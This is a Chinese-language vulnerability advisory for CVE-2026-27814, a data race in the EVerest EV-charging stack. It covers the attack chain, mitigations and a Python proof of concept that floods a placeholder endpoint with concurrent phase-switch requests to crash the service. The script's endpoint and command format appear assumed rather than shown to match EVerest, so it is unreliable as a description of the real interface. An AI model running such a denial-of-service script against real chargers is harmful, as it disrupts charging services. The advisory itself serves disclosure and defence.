CVE-2026-27814 CVSS 4.2 中危

CVE-2026-27814 EVerest数据竞争漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27814

漏洞类型

数据竞争

CVSS评分

4.2 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EVerest

漏洞概述

EVerest是一款电动汽车充电软件栈。在2026.02.0版本之前，该软件存在数据竞争漏洞。当状态机循环运行期间，并发执行单相与三相切换请求时，会触发C++未定义行为。该问题可能导致系统服务异常。版本2026.02.0已修复此漏洞。

技术细节

该漏洞的根源在于EVerest软件栈的C++实现中存在并发同步缺失。在典型的充电过程中，主状态机循环不断轮询和更新充电状态及相关变量。如果系统在充电或等待期间接收到单相与三相切换请求（`ac_switch_three_phases_while_charging`），且该请求的处理路径与状态机的关键区域未通过互斥锁或原子操作进行保护，就会发生典型的数据竞争。由于攻击向量为邻接网络，攻击者无需用户交互即可发送高频并发请求。这种并发执行触发了C++标准中的未定义行为，可能导致共享内存数据被破坏或直接引发服务崩溃，从而干扰正常的充电服务。

攻击链分析

STEP 1

侦察阶段

识别网络中易受攻击的EVerest设备（版本<2026.02.0）。

STEP 2

攻击触发

攻击者通过邻接网络，在设备充电时发送并发的相位切换请求。

STEP 3

竞态利用

请求与状态机循环产生冲突，触发C++数据竞争及未定义行为。

STEP 4

影响达成

导致设备数据损坏或服务拒绝，影响充电功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-27814: Triggering Data Race in EVerest
import threading
import requests
import time

# Target configuration
TARGET_URL = "http://<target-ip>:<port>/api/control"
HEADERS = {"Content-Type": "application/json"}

# Payload to trigger the race condition
payload_switch = {
    "command": "ac_switch_three_phases_while_charging",
    "enable": True
}

def trigger_state_machine_load():
    """Simulates the state machine loop activity."""
    while True:
        try:
            requests.get(f"{TARGET_URL}/status", timeout=2)
        except Exception:
            break

def trigger_race_condition():
    """Sends rapid concurrent requests to exploit the data race."""
    for _ in range(50):
        try:
            requests.post(TARGET_URL, json=payload_switch, headers=HEADERS, timeout=1)
        except Exception:
            pass

if __name__ == "__main__":
    # Create threads to simulate concurrent execution
    t1 = threading.Thread(target=trigger_state_machine_load)
    t2 = threading.Thread(target=trigger_race_condition)
    
    t1.start()
    t2.start()
    
    # Wait for potential crash or UB manifestation
    time.sleep(10)

影响范围

EVerest < 2026.02.0

防御指南

临时缓解措施

临时缓解措施包括在充电过程中禁用相位切换功能，或在应用层对控制请求实施严格的速率限制，以防止并发请求触发竞态条件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表